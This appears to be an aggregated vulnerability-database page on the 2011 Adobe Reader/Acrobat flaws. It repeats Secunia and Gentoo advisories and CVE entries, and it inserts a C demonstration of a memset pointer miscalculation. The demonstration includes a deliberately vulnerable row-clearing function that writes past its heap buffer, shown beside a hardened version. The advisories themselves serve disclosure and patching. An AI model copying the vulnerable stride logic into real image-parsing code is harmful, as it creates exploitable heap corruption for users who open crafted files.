Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 
14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. 
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.

The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.

ORIGINAL ADVISORY:
Adobe (APSB11-03, APSB11-02):
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891

Gentoo Linux Security Advisory GLSA 201201-19
http://security.gentoo.org/
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19

Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks.
Affected packages
=================
Package            / Vulnerable / Unaffected
app-text/acroread    < 9.4.7      >= 9.4.7

Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details.

Impact
======
A remote attacker could entice a user to open a specially crafted PDF file using Adobe Reader, possibly resulting in the remote execution of arbitrary code, a Denial of Service, or other impact.

Workaround
==========
There is no known workaround at this time.

Resolution
==========
All Adobe Reader users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"

References
==========
[ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0022 CVE-2011-0566 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603. Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution or a denial-of-service (DoS) condition; it is distinct from CVE-2011-0567 and CVE-2011-0603. A third party could execute arbitrary code or cause a DoS condition via a crafted image. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to 8.2.6, 9.4.2 and 10.0.1 are affected.
For more information: SA43207
SOLUTION: Updated packages are available via Red Hat Network.
VAR-201102-0023 CVE-2011-0567 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution or a denial-of-service (DoS) condition; it is distinct from CVE-2011-0566 and CVE-2011-0603. A third party could execute arbitrary code or cause a DoS condition via a crafted image. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within AcroRd32.dll. Initially, a pointer passed to memset can be miscalculated, and the resulting write corrupts heap memory. Later, the application attempts to use the modified data, which can be leveraged to execute arbitrary code in the context of the user invoking the Reader application. Adobe Reader and Acrobat versions prior to 8.2.6, 9.4.2 and 10.0.1 are affected.
For more information: SA43207
SOLUTION: Updated packages are available via Red Hat Network.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-03.html

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Abdullah Ada
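The entry names the outcome, a miscalculated pointer handed to memset, but not the arithmetic behind it, so the C program below is an added, hypothetical illustration of one way such a pointer goes wrong. It is not Adobe's code and does not reproduce the real AcroRd32.dll calculation; the BMP-style 4-byte row padding, the dimensions and the function names are assumptions made for the demonstration. The buffer is allocated from the unpadded row size while rows are cleared with the padded stride, so for widths whose row size is not a multiple of four the last rows' memset targets lie beyond the allocation (again observed through a canary inside one oversized malloc rather than by crashing). The hardened variant computes the stride once, with an overflow check, and derives both the allocation and the row pointers from it.

```c
/*
 * Added, hypothetical example for this page: a pixel buffer sized with one
 * stride and cleared row by row with another, so the row pointer handed to
 * memset can point past the allocation.  Not Adobe's code; it does not
 * reproduce the real AcroRd32.dll calculation.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CANARY      0x5A
#define CANARY_LEN  32

/* Assumed BMP-style layout: rows are padded to a multiple of 4 bytes. */
uint32_t padded_stride(uint32_t width, uint32_t bytes_per_pixel)
{
    return (width * bytes_per_pixel + 3u) & ~3u;
}

/* Allocate width x height pixels and zero them one row at a time.
 * Returns 1 if the canary placed after the buffer is intact, 0 if a row's
 * memset ran past the allocation, -1 if the hardened path refused the image. */
int clear_rows(int hardened, uint32_t width, uint32_t height, uint32_t bpp)
{
    uint32_t use_stride = padded_stride(width, bpp);   /* stride used when touching rows */
    uint32_t alloc_stride;

    if (hardened) {
        /* Refuse dimensions whose stride arithmetic would wrap in 32 bits,
         * then size the allocation from the very same stride the loop uses. */
        if (bpp == 0 || width > (UINT32_MAX - 3u) / bpp) return -1;
        alloc_stride = use_stride;
    } else {
        /* VULNERABLE: unpadded size, smaller than use_stride whenever
         * width*bpp is not a multiple of 4. */
        alloc_stride = width * bpp;
    }

    size_t size = (size_t)alloc_stride * height;
    uint8_t *buf = malloc(size + CANARY_LEN);   /* canary region keeps the overrun in-bounds */
    if (!buf) return -1;
    memset(buf + size, CANARY, CANARY_LEN);     /* sentinel just past the buffer */

    int rc = 1;
    for (uint32_t y = 0; y < height && rc == 1; y++) {
        size_t off = (size_t)y * use_stride;    /* lands beyond size in the vulnerable build */
        if (hardened && off + use_stride > size)
            rc = -1;                            /* explicit guard; never fires once both strides agree */
        else
            memset(buf + off, 0, use_stride);
    }
    for (size_t i = 0; rc == 1 && i < CANARY_LEN; i++)
        if (buf[size + i] != CANARY) rc = 0;
    free(buf);
    return rc;
}

int main(void)
{
    printf("5x4 @1bpp  vulnerable=%d hardened=%d\n", clear_rows(0, 5, 4, 1), clear_rows(1, 5, 4, 1));
    printf("2x3 @2bpp  vulnerable=%d hardened=%d\n", clear_rows(0, 2, 3, 2), clear_rows(1, 2, 3, 2));
    printf("huge width hardened=%d\n", clear_rows(1, 0x40000001u, 1, 4));
    return 0;
}
```

The 2x3 at 2 bytes per pixel case shows why such bugs survive ordinary testing: when width*bpp is already 4-byte aligned both strides agree and nothing overflows, so only specific dimensions, such as 5x4 at 1 byte per pixel, expose the miscalculated row pointer.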
Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 9) An unspecified error may allow code execution. 
10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 
30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. 
ORIGINAL ADVISORY:
Adobe (APSB11-03):
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html

ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/

FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html

iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
VAR-201102-0021 CVE-2011-0565 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. This is a different vulnerability from CVE-2011-0585. An attacker could execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the affected application to crash. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected. For more information: SA43207

SOLUTION: Updated packages are available via Red Hat Network.

TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA43207
VERIFY ADVISORY: http://secunia.com/advisories/43207/
RELEASE DATE: 2011-02-09
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges.
5) An unspecified error when parsing images can be exploited to corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks.

Affected packages
=================
-------------------------------------------------------------------
   Package              /  Vulnerable  /  Unaffected
-------------------------------------------------------------------
 1 app-text/acroread       < 9.4.7        >= 9.4.7

Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details.

Impact
======
A remote attacker could entice a user to open a specially crafted PDF file using Adobe Reader, possibly resulting in the remote execution of arbitrary code, a Denial of Service, or other impact.

Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"

References
==========
[ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
